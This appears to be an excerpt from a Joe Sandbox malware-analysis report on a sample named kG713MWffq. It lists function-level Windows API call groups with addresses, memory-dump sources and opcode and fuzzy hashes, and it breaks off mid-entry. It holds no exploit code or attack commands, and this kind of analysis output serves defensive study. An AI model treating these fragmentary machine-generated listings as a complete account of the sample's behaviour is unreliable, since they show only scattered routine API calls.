                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2880819207-0
                                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                        • String ID:
                                                                                        • API String ID: 1187119602-0
                                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1597257046-0
                                                                                        • Opcode ID: 5ab67e947389c1bd354b8ecd579da357cbff7886dd3d022b7bd5ccc19f2b0eaa
                                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                        • Opcode Fuzzy Hash: 5ab67e947389c1bd354b8ecd579da357cbff7886dd3d022b7bd5ccc19f2b0eaa
                                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                        • String ID:
                                                                                        • API String ID: 237123855-0
                                                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyObject$IconWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3349847261-0
                                                                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                        • String ID:
                                                                                        • API String ID: 2223660684-0
                                                                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                        APIs
                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                        • EndPath.GDI32(?), ref: 00447336
                                                                                        • StrokePath.GDI32(?), ref: 00447344
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                        • String ID:
                                                                                        • API String ID: 2783949968-0
                                                                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2710830443-0
                                                                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00472B63
                                                                                        • GetDC.USER32(00000000), ref: 00472B6C
                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                        • GetDC.USER32(00000000), ref: 00472BBB
                                                                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2889604237-0
                                                                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                        APIs
                                                                                        • __getptd_noexit.LIBCMT ref: 00415150
                                                                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                        • __freeptd.LIBCMT ref: 0041516B
                                                                                        • ExitThread.KERNEL32 ref: 00415173
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1454798553-0
                                                                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1493997410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494072034.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494100188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494125802.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494143906.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1494189478.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_kG713MWffq.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strncmp
                                                                                        • String ID: Q\E
                                                                                        • API String ID: 909875538-2189900498
                                                                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                        APIs
                                                                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1494018108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
